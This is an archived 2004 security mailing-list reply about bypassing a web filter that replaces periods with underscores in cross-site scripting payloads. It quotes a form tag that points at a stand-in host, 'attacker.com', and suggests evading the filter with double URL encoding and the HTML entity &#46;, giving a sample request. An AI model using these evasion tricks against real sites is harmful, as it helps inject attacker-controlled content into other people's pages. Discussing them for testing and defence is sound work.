WebApp Sec mailing list archives

Re: Fullstop Substitution in XSS

From: Jonathan Stade <jstade () mtroyal ca>
Date: Tue, 01 Jun 2004 13:38:46 -0600

On Tue, 2004-06-01 at 00:03, windo () windowlicker dyn ee wrote:

Hey.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script";> is of course being filtered
into: <form target="http://attacker_com/path/to/script";>

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).


Of course i dont know how the substitution works, but double encoding like
this MIGHT work:

print.php?print=%3Ca%20href=%22http://www%26%2346;google%26%2346;com/%22%3Egoogle%3C/a%3E

print.php does what you described in a very basic manner, prints the
input substituting any '.' with '_'.


Along similar lines, another thing to try might be to use the HTML
entity &#46; which is a period/fullstop, and also try using the entity,
but unicode encode it. Not sure if that will work, it was just something
that popped into my head.

Current thread:

Fullstop Substitution in XSS Calum Power (May 31)
- RE: Fullstop Substitution in XSS V. Poddubniy (Jun 01)
- RE: Fullstop Substitution in XSS Harry Metcalfe (Jun 01)
- RE: Fullstop Substitution in XSS Pete Foster (Jun 01)
- Re: Fullstop Substitution in XSS windo (Jun 01)
  - Re: Fullstop Substitution in XSS Jonathan Stade (Jun 01)
- Re: Fullstop Substitution in XSS Liam Quinn (Jun 01)
- Re: Fullstop Substitution in XSS Joseph Birr-Pixton (Jun 01)
- <Possible follow-ups>
- RE: Fullstop Substitution in XSS Michael Silk (Jun 01)